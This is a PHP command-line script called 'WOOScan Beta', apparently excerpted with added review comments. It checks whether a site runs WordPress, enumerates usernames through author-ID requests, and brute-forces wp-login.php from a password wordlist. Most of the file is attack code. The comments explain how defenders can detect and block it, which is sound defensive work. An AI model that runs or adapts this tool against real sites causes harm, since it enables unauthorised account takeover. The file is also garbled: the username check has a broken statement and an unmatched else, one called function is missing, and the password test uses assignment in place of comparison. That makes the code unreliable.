Wordpress\n "); } else { v("\t[ ".date("H:i:s")." ] $url ==> Not WordPress\n "); } }
// The line above is the tail of a function whose beginning lies outside this
// excerpt; it is kept exactly as found. The dispatch code further down calls
// check($url), which is not defined in the visible part of the file.

// Normalise a user-supplied target string.
// If the string contains "http://" or "https://" it is returned unchanged;
// otherwise "http://" is prepended. Both patterns are unanchored, so they match
// the scheme anywhere in the string, not only at the start.
function vurl($url){
    if(preg_match("#http://#", $url)){
        // No-op assignment: the value is kept as entered.
        $url = $url;
    } elseif (preg_match("#https://#", $url)) {
        // No-op assignment: the value is kept as entered.
        $url = $url;
    } else {
        $url = "http://".$url;
    }
    return $url;
}

// Thin cURL wrapper used for every HTTP request in this script.
//   $url  - request target.
//   $data - optional request body; when it is not loosely equal to null it is
//           set as CURLOPT_POSTFIELDS, which makes cURL send a POST.
// Returns whatever curl_exec() returns (the response body as a string, since
// CURLOPT_RETURNTRANSFER is set). Redirects are followed. No timeout or TLS
// options are set in this function.
// Detection note: every request carries the same hard-coded User-Agent
// (Chrome 59 on Windows NT 6.1), so it appears verbatim in access logs.
function curls($url,$data = null){
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36");
    if($data !=null) {
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    }
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    $result = curl_exec($ch);
    return $result;
    // Unreachable: placed after the return, so the handle is never closed here.
    curl_close($ch);
}

// Output helper: echoes its argument (an empty string by default).
function v($x=""){
    echo $x;
}

// Username check mode: requests "$url?author=N" for N = 1..10 and prints one
// line per ID.
// Detection note: on the target this shows up as ten sequential GET requests
// that differ only in the author parameter. Refusing author-ID queries from
// unauthenticated clients limits what such lookups can reveal.
function uc($url){
    v("\t[ ".date("H:i:s")." ] Check Username : ".$url."\n");
    for($id=1;$id<=10;$id++){
        $get = curls("$url?author=$id",null);
        // NOTE(review): this statement is incomplete as found. Text appears to be
        // missing between the pattern opener and "$login" (possibly markup stripped
        // during extraction), and the "} else {" below has no visible matching "if".
        // Left untouched rather than guessed at.
        preg_match("/ $login \n");
        } else {
            v("\t[ ".date("H:i:s")." ] ID ( $id ) | Username Not Found!\n");
        }
    }
}

// Login attempt mode: sends one request to "<url>wp-login.php" with the body
// "&log=<username>&pwd=<password>" (a POST, because curls() receives data),
// searches the response for the text "The password you entered for the
// username", and prints one of two status lines containing the candidate
// password in clear text.
// Detection note: this appears as repeated POSTs to wp-login.php from a single
// client using the fixed User-Agent set in curls(). Login rate limiting,
// account lockout and multi-factor authentication are the relevant controls.
function bf($url,$username,$password){
    $get = curls($url."wp-login.php","&log=$username&pwd=$password");
    preg_match("/The password you entered for the username/", $get , $login);
    if($login[0]=""){
        v("\t[ ".date("H:i:s")." ] Cracking.... | Password => $password\n");
    } else {
        v("\t[ ".date("H:i:s")." ] Cracking.... | Not Matches => $password\n");
    }
}

// Prints the tool banner, including the platform label returned by OS().
function banner(){
    v("\n\t====================================================\n\tWOOScan Beta\n\t====================================================\n\tWordpress Tools Scan V.0.1 \n\tTools Running In Device [ ".OS()." ]\n\tCode By ZakirDotID\n\tUsage : -help\n\t====================================================\n");
}

// Opens and returns a new read handle on php://stdin. Each call opens a fresh
// handle; no caller in this excerpt closes it.
function _rd(){
    return fopen('php://stdin', 'r');
}

// Returns "Windows" when PHP_OS starts with "WIN" (case-insensitive), otherwise
// "Linux". Any other platform is therefore also labelled "Linux".
function OS() {
    return (substr(strtoupper(PHP_OS), 0, 3) === "WIN") ? "Windows" : "Linux";
}

// Command-line dispatch on the first argument. Each mode prints the banner,
// then prompts on stdin for its inputs. With no argument the banner and an
// error line are printed; an unrecognised argument prints the banner only.
if (isset($argv[1])) {
    switch ($argv[1]) {
        case '-help':
            banner();
            v("\n\tUsage : \n\t[ -wpbf ] Wordpress Brute Force Login\n\t[ -usercheck ] Wordpress Checker Username\n\t[ -scan ] Wordpress Site Checker\n");
            break;
        case '-scan':
            banner();
            v("\n\tScanning Site Wordpress Beta | Example : http://www.site.com/path/\n\tInput Url : ");
            $url = trim(fgets(_rd()));
            $url = vurl($url);
            // check() is defined outside the visible part of this file.
            check($url);
            break;
        case '-usercheck':
            banner();
            v("\n\tScanning Username Wordpress Beta | Example : http://www.site.com/path/\n\tInput Url : ");
            $url = trim(fgets(_rd()));
            $url = vurl($url);
            uc($url);
            break;
        case '-wpbf':
            banner();
            v("\n\tBrute Force Wordpress Beta | Example : http://www.site.com/path/ \n\tInput Url : ");
            $url = trim(fgets(_rd()));
            $url = vurl($url);
            v("\tInput Username : ");
            $username = trim(fgets(_rd()));
            v("\tInput Wordist : ");
            // The wordlist path is taken from stdin and read whole into memory;
            // the script exits with a message if the read yields a falsy value.
            $list = trim(fgets(_rd()));
            $paswd = file_get_contents($list) or exit("\n\tFile Not found!\n");
            // Entries are split on CRLF only.
            $paswds = explode("\r\n", $paswd);
            v("\tPlease Wait....\n");
            // Single one-second pause before the loop; there is no delay between
            // the individual requests, so the target sees them as a burst.
            sleep(1);
            foreach ($paswds as $password) {
                bf($url,$username,$password);
            }
            break;
        default:
            banner();
            break;
    }
} else {
    banner();
    v("\tError Command Not found!\n");
}
//echo vurl("https://localhost");